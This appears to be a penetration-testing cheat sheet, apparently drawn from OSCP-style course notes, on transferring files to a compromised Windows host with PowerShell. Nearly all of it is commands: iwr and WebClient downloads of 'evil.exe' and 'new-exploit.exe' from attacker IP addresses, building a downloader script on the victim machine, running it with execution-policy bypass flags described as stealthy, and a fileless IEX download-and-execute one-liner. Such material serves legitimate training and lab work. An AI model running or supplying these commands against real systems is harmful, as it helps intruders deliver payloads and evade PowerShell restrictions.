iwr (Invoke-Web-Request)
Transfer a file with the following command:
1
| PS> iwr -uri http://10.10.14.4/PsBypassCLM.exe -OutFile PsBypassCLM.exe
|
Execute this commands to create wget.ps1 on victim machine:
1
2
3
4
| echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://10.11.0.4/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
|
To ensure both correct and stealthy execution, we specify a number of options in the execution of the script, it must be executed on cmd as shown below:
1
| powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
|
One-liner of the above command:
1
| powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://localhost/evil.exe', 'new-exploit.exe')
|
If we want to download and execute a PowerShell script without saving it to disk, we can once again use the System.Net.Webclient class. This is done by combining the DownloadString method with the Invoke-Expression cmdlet (IEX).3 To demonstrate this, we will create a simple PowerShell script on our Kali machine:
1
2
| kali@kali:/var/www/html$ sudo cat helloworld.ps1
Write-Output "Hello World"
|
Next, we will run the script with the following command on our compromised Windows machine (Listing 21):
1
2
| C:\Users\Offsec> powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://10.11.0.4/helloworld.ps1')
Hello World
|
New-Object
1
| powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
|